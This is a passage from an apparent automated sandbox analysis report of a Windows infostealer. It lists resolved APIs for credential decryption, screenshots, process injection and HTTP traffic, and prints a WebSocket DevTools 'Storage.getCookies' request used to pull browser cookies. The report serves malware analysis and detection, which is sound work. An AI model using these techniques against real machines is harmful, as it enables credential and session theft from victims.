                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73900000,GdipGetImageEncodersSize), ref: 00418E17
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GdipGetImageEncoders), ref: 00418E2D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GdipCreateBitmapFromHBITMAP), ref: 00418E43
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GdiplusStartup), ref: 00418E59
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GdiplusShutdown), ref: 00418E6F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GdipSaveImageToStream), ref: 00418E85
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GdipDisposeImage), ref: 00418E9B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GdipFree), ref: 00418EB1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(753A0000,GetHGlobalFromStream), ref: 00418ECB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CreateStreamOnHGlobal), ref: 00418EE1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CoUninitialize), ref: 00418EF7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CoInitialize), ref: 00418F0D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CoCreateInstance), ref: 00418F23
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76310000,BCryptGenerateSymmetricKey), ref: 00418F3D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00418F53
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00418F69
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00418F7F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00418F95
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(BCryptOpenAlgorithmProvider), ref: 00418FAB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76910000,GetWindowRect), ref: 00418FC9
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GetDesktopWindow), ref: 00418FDF
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GetDC), ref: 00418FF5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CloseWindow), ref: 0041900B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(wsprintfA), ref: 00419021
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(EnumDisplayDevicesA), ref: 00419037
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GetKeyboardLayoutList), ref: 0041904D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CharToOemW), ref: 00419063
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(wsprintfW), ref: 00419079
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75B30000,RegQueryValueExA), ref: 00419093
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RegEnumKeyExA), ref: 004190A9
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RegOpenKeyExA), ref: 004190BF
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RegCloseKey), ref: 004190D5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RegEnumValueA), ref: 004190EB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75670000,CryptBinaryToStringA), ref: 00419105
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectData), ref: 0041911B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76AC0000,SHGetFolderPathA), ref: 00419135
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(ShellExecuteExA), ref: 0041914B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F4E0000,InternetOpenUrlA), ref: 00419169
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetConnectA), ref: 0041917F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetCloseHandle), ref: 00419195
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetOpenA), ref: 004191AB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpSendRequestA), ref: 004191C1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpOpenRequestA), ref: 004191D7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetReadFile), ref: 004191ED
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetCrackUrlA), ref: 00419203
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419219
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041922F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AE0000,StrCmpCA), ref: 00419249
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(StrStrA), ref: 0041925F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(StrCmpCW), ref: 00419275
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(PathMatchSpecA), ref: 0041928B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76300000,GetModuleFileNameExA), ref: 004192A5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6D380000,RmStartSession), ref: 004192BF
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RmRegisterResources), ref: 004192D5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RmGetList), ref: 004192EB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RmEndSession), ref: 00419301
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6D190000,SymMatchString), ref: 0041931B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptGenerateSymmetricKey$BCryptOpenAlgorithmProvider$BCryptSetProperty$BitBlt$CharToOemW$CloseWindow$CoCreateInstance$CoInitialize$CoUninitialize$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateFileA$CreateProcessA$CreateStreamOnHGlobal$CreateToolhelp32Snapshot$CryptBinaryToStringA$CryptUnprotectData$DeleteFileA$DeleteObject$EnumDisplayDevicesA$FindClose$FindFirstFileA$FindNextFileA$FreeLibrary$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipFree$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetCurrentProcessId$GetDC$GetDesktopWindow$GetEnvironmentVariableA$GetFileAttributesA$GetFileSize$GetFileSizeEx$GetHGlobalFromStream$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalProcessorInformationEx$GetModuleFileNameA$GetModuleFileNameExA$GetSystemPowerStatus$GetThreadContext$GetTimeZoneInformation$GetUserDefaultLocaleName$GetVolumeInformationA$GetWindowRect$GetWindowsDirectoryA$GlobalAlloc$GlobalFree$GlobalLock$GlobalSize$HeapFree$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetCrackUrlA$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsWow64Process$LocalAlloc$LocalFree$MultiByteToWideChar$OpenProcess$PathMatchSpecA$Process32First$Process32Next$ReadProcessMemory$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$ResumeThread$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$SHGetFolderPathA$SelectObject$SetEnvironmentVariableA$SetFilePointer$SetThreadContext$ShellExecuteExA$StrCmpCA$StrCmpCW$StrStrA$SymMatchString$TerminateProcess$VirtualAllocEx$VirtualProtect$WideCharToMultiByte$WriteFile$WriteProcessMemory$bcrypt.dll$dbghelp.dll$gdiplus.dll$lstrcpynA$ole32.dll$psapi.dll$rstrtmgr.dll$shell32.dll$shlwapi.dll$wininet.dll$wsprintfA$wsprintfW
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-859426583
                                                                                                                                                                                                                                                                                                  • Opcode ID: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a0f86706a4d50df5c0891041486815c3a2fdb24875638c890ef6a63e7135bce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0032D6B0A41B50AFD7116F61FD06B257AA3FB85705354603BB802972B2DBBA1850EFD8
                                                                                                                                                                                                                                                                                                  Function 004054A0 Relevance: 120.4, APIs: 62, Strings: 6, Instructions: 1411networkCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memcpy.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 004024B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77355E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,ws://,00000005,?,00000000,00000005), ref: 00405594
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000005), ref: 004055FD
                                                                                                                                                                                                                                                                                                  • memchr.MSVCRT ref: 00405644
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000005,-00000005), ref: 0040570A
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000005,000000FF,?,00000000,00000005), ref: 004057D4
                                                                                                                                                                                                                                                                                                  • memchr.MSVCRT ref: 00405814
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,000000FF), ref: 004058DA
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,?,00000001,000000FF), ref: 0040595E
                                                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00405993
                                                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004059AE
                                                                                                                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 00405A18
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 00405A2A
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00405A30
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AA0
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AF3
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000,?,00000000,00000005), ref: 00405B46
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED20: memmove.MSVCRT(?,00000000,?,00000000,-00000001,77355E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDA3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406940: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,0040D83E,00000000,?,00000000), ref: 00406982
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406940: memmove.MSVCRT(?,?,?,00000000,?,0040D83E,00000000,?,00000000), ref: 004069AA
                                                                                                                                                                                                                                                                                                  • htons.WS2_32(00000000), ref: 00405B76
                                                                                                                                                                                                                                                                                                  • freeaddrinfo.WS2_32(00000000), ref: 00405B96
                                                                                                                                                                                                                                                                                                  • connect.WS2_32(?,00000002,00000010), ref: 00405BAB
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,?,GET ,00000000,00420ACE,00000001), ref: 00405C38
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 00405C45
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00405C4B
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405CC2
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D29
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D95
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405DFC
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405E6D
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405EE6
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405F75
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405FE3
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040604B
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004060AD
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040610F
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00406171
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004061D9
                                                                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 0040620B
                                                                                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00406246
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00406252
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040625E
                                                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040626A
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 004062E7
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 004062ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406B00: memcpy.MSVCRT(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00406742,00000088,0042150A,00000000,?), ref: 00406B7A
                                                                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004063F3
                                                                                                                                                                                                                                                                                                  • recv.WS2_32(00000000,00000000,00001000,00000000), ref: 00406465
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,00000000), ref: 004064A3
                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?), ref: 004065BF
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000,?,00000000,00000005), ref: 0040671B
                                                                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00406763
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0040676A
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00406770
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 004067C8
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 004067CE
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040683D
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406894
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040692E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Sec-WebSocket-Version: 13, xrefs: 00405EB3
                                                                                                                                                                                                                                                                                                  • GET , xrefs: 00405BFC
                                                                                                                                                                                                                                                                                                  • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00405DCF
                                                                                                                                                                                                                                                                                                  • {"id":1,"method":"Storage.getCookies"}, xrefs: 0040623C
                                                                                                                                                                                                                                                                                                  • ws://, xrefs: 0040558E
                                                                                                                                                                                                                                                                                                  • HTTP/1.1Host: , xrefs: 00405C0B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@$memcpy$Cleanupclosesocket$rand$memmovesend$memchrrecv$??2@Concurrency::cancel_current_taskStartup_invalid_parameter_noinfo_noreturnconnectfreeaddrinfogetaddrinfohtonsmemcmpsocket
                                                                                                                                                                                                                                                                                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $ws://${"id":1,"method":"Storage.getCookies"}
                                                                                                                                                                                                                                                                                                  • API String ID: 2888708447-1943833848
                                                                                                                                                                                                                                                                                                  • Opcode ID: 32d35d3c3b93b1f3239c85e580d068b8d1f54f7d7030b5911126dd3e0ce0314f
                                                                                                                                                                                                                                                                                                  • Instruction ID: e4f2ee01d7335c5added529db0d38c8452bd00aeee575b7ecc144f5d552c7b4a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d35d3c3b93b1f3239c85e580d068b8d1f54f7d7030b5911126dd3e0ce0314f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3C2D3706087808BD734DB28C894BAFB7E1AF85318F14093EF596AB3C1D7799844CB5A
                                                                                                                                                                                                                                                                                                  Function 004081B0 Relevance: 109.8, APIs: 34, Strings: 28, Instructions: 1338stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 827 4081b0-408273 call 410530 ExpandEnvironmentStringsA call 410240 call 4101c0 call 4102e0 call 410340 call 410290 call 410230 * 2 call 4101c0 * 2 call 410530 FindFirstFileA 850 408279-408298 827->850 851 4093da-40944f call 410230 * 12 827->851 853 4082cd-408308 call 402400 850->853 886 409452-409457 _invalid_parameter_noinfo_noreturn 851->886 859 40830a-408319 strlen 853->859 860 40831b-40832a 853->860 859->860 861 408360-408364 860->861 862 40832c-408333 860->862 866 408437-408449 861->866 867 40836a-408392 call 402400 861->867 864 408335 862->864 865 40833b-40834e memcmp 862->865 864->865 865->867 869 408350-408352 865->869 871 408491-408493 866->871 872 40844b-40845d 866->872 883 408394-4083a5 strlen 867->883 884 4083a7-4083a9 867->884 869->867 876 408354-408356 869->876 874 4082b2-4082c7 FindNextFileA 871->874 875 408499-408502 call 410240 call 4102e0 call 410340 * 2 call 410290 call 410230 * 3 871->875 878 408488-40848e ??3@YAXPAX@Z 872->878 879 40845f-408461 872->879 874->853 885 4093cb-4093d7 FindClose 874->885 936 408504-40851d call 410530 StrCmpCA 875->936 937 408527-40855f call 410340 * 3 875->937 876->866 882 40835c 876->882 878->871 879->886 887 408467-40846c 879->887 882->867 890 4083af-4083bb 883->890 884->890 885->851 887->886 891 408472-408477 887->891 896 4083d8-4083df 890->896 897 4083bd-4083c4 890->897 891->886 893 40847d-408480 891->893 893->886 898 408486 893->898 900 4083e1-4083e4 896->900 901 4083e7-4083f2 896->901 903 4083c6 897->903 904 4083c9-4083d6 memcmp 897->904 898->878 900->901 901->866 906 4083f4-408403 901->906 903->904 904->896 904->901 909 408405-408407 906->909 910 40842e-408434 ??3@YAXPAX@Z 906->910 909->886 913 40840d-408412 909->913 910->866 913->886 916 408418-40841d 913->916 916->886 919 408423-408426 916->919 919->886 922 40842c 919->922 922->910 942 408561 936->942 943 40851f-408525 936->943 951 40859c-4085e3 call 410340 call 410290 call 410230 * 4 call 410530 StrCmpCA 937->951 945 408564-408596 call 410340 * 3 942->945 943->945 945->951 970 4087f0-408804 StrCmpCA 951->970 971 4085e9-4085fd StrCmpCA 951->971 972 40880a-408818 StrCmpCA 970->972 973 40894f-4089f6 call 410200 * 7 call 407dd0 970->973 971->970 974 408603-40871a call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 call 4101c0 call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 4076b0 971->974 976 408b08-408b23 call 410530 StrCmpCA 972->976 977 40881e-408838 call 410200 call 411520 972->977 1096 4089fb 973->1096 1306 408720-4087b3 call 410200 * 5 call 413e50 call 410230 974->1306 1307 4087b8-4087ed call 410530 DeleteFileA call 4104e0 call 410530 call 410230 * 2 974->1307 989 408a00-408a07 976->989 990 408b29-408b2f 976->990 1000 408d30-408d44 StrCmpCA 977->1000 1001 40883e-408844 977->1001 992 4082a0-4082ad call 4104e0 * 2 989->992 993 408a0d-408afb call 410200 * 4 call 4101c0 call 410200 * 4 call 4081b0 989->993 990->989 996 408b35-408b42 